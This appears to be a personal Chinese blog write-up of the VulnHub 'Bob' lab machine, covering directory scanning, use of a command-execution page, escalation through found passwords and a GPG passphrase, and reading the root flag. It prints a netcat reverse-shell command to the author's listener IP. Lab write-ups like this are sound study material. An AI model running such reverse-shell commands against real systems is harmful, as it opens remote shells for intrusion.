vulnhub-Bob


信息收集


靶机开放了80和21端口(我全程下来都没有利用过这个端口),打开80界面发现就一张图片,其余什么也没有,

所以就dirb一下网站的文件目录

发现了敏感文件robots.txt,访问发现是四个页面,逐一访问在/dev_shell.php页面发现了一些有用的东西

前渗透阶段

我们发现/dev_shell.php是一个命令执行的页面,所以这就就是我们拿到shell的一个点,在这里我利用了普通的反弹shell,发现并没有什么用,所以就去看了别人的wp,发现这里对我们输入语句做了比较严格的限制,找了半天找到了一个能用到的反弹shell语句

/bin/nc -e /bin/sh 192.168.10.207 7744    //反弹shell语句

kali监听端口之后就到了我们接下来的提权阶段

后渗透阶段

我们暂时的用户为www-data,su一下发现并没有什么可提权的点,系统版本也找不到相关的漏洞,直接去根目录下看看发现了flag.txt文件,但是我们没有权限(很肏),所以就去别的用户目录下看看有没有什么可以利用的信息,这里我们可以联想一下最初的时候web页面的介绍,提示我们注意Documents,所以就看一下每个用户的Documents目录,在bob用户的Documents目录看到了一些我们感兴趣的东西。

这里的login.txt.gpg文件我在开始做的时候觉得很奇怪,在我双看了别人的wp之后发现此文件是一个被加密过的文件,但是我们没有密码,翻了一下staff.txt文件,看了看之后发没觉得有什么发现,然后使劲翻Secret文件终于发现了一个有用的东西

起先我没看懂这是什么,所以就叒看了别人的wp,发现这是一个藏头诗,将头部聚集起来就是harpocrates的大写,也就是我们之前看到的被加密过的文件的密码,本来我挺高兴的去解密结果发现自己不会解密命令,所以就叕去看了别人的wp,解密命令如下

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

但是我们没有权限(很肏),

于是就只能到其他用户目录下看看有没有能用的信息,然后我们在elliot目录下发现了一个文档

发现了james的密码,su一下(james的用户名叫jc),只时候我们再到bob的Documents目录下看看能不能解密刚才那个文件,发现成功

发现了bob用户的密码,直接su一手,只时候我想到了那个在根目录下的flag.txt文件,看一看这次有没有权限打开,最后成功拿到flag(我也不知道为什么要用sudo命令)


文章作者: lemon-fan
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 lemon-fan !
 上一篇
一些知识的积累 一些知识的积累
关于博客我今天被博客cdn加速给疯狂军训,到最后我才发现,是我的博客用的cdn自身有问题,先在这里介绍一下我用的cdn:jsdelivr,是一个对部署在github上的博客有加速功能的cdn,但是,这个cdn你如果让他加速图片的话,例如:你
2020-11-27 lemon-fan
下一篇 
vulnhub-Lampiao vulnhub-Lampiao
信息收集扫描靶机IP,以及靶机的端口,此靶场的开放端口会有点特殊,只看到了22端口和8端口,打开80端口,发现什么也没有,觉得应该像之前的做过的靶场一样有端口我们没有扫描出来,所以我用nmap再次扫描发现了一个不一样的端口打开1898界面,
2020-11-25
  目录